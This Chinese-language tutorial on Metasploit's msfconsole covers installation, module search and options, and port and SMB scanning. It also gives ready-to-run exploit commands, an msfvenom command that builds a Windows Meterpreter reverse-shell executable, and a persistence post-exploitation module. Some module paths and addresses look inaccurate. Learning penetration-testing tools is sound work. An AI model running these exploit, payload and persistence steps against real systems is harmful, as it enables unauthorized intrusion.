一、简介

msfconsole 是 Metasploit Framework 的命令行界面，用于执行各种安全测试和渗透测试任务。Metasploit 是一个功能强大的渗透测试工具，提供了丰富的漏洞利用模块、后渗透工具和自动化功能。

二、安装

• Kali Linux（Metasploit 已预装）：

  1 2	sudo apt update sudo apt install metasploit-framework

• 其他 Linux 发行版： 可以通过 Rapid7 官方网站 获取安装指南。

三、基本语法

1

msfconsole

四、常用命令

（一）启动 msfconsole

1

msfconsole

（二）查找模块

1

search <keyword>

例如：

1

search apache

（三）使用模块

1

use <module>

例如：

1

use exploit/unix/webapp/apache_mod_cgi

（四）设置模块选项

1

set <option> <value>

例如：

1
2

set RHOSTS 192.168.1.100
set RPORT 80

（五）查看模块选项

1

show options

（六）运行模块

1

run

（七）退出 msfconsole

1

exit

五、高级用法

（一）自动化攻击

使用 msfconsole 的自动化功能可以快速执行攻击任务。例如：

1

msfconsole -q -x "use exploit/unix/webapp/apache_mod_cgi; set RHOSTS 192.168.1.100; set RPORT 80; run"

（二）生成 Meterpreter 有效载荷

1

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe

（三）使用 Meterpreter 会话

1
2

sessions -l
sessions -i <session_id>

（四）后渗透攻击

1
2

search post
use post/windows/manage/persistence

（五）利用漏洞

1
2
3
4
5

search exploit
use exploit/unix/webapp/apache_mod_cgi
set RHOSTS 192.168.1.100
set RPORT 80
run

（六）端口扫描

1. 查看端口扫描模块：

   1	search portscan

2. 使用端口扫描模块：

   1	use auxiliary/scanner/portscan/top

3. 查看模块选项：

   1	show options

4. 设置目标 IP：

   1	set RHOSTS 192.168.1.100

5. 设置线程数：

   1	set THREADS 100

6. 执行扫描：

   1

   run

（七）服务扫描

1. 查看服务扫描模块：

   1	search smb_version

2. 使用服务扫描模块：

   1	use auxiliary/scanner/smb/smb_version

3. 查看模块选项：

   1	show options

4. 设置目标 IP：

   1	set RHOSTS 192.168.1.100

5. 设置线程数：

   1	set THREADS 10

6. 执行扫描：

   1

   run

六、注意事项

1. 权限问题：某些功能（如监听低端口号）可能需要管理员权限。
2. 网络环境：某些网络环境可能限制某些模块的使用。
3. 法律问题：未经授权的渗透测试行为可能违反法律法规。

七、总结

msfconsole 是一个功能强大的渗透测试工具，适用于多种安全测试场景，包括漏洞利用、后渗透攻击和自动化攻击。通过掌握基本语法和高级用法，可以快速定位网络中的漏洞并进行安全审计。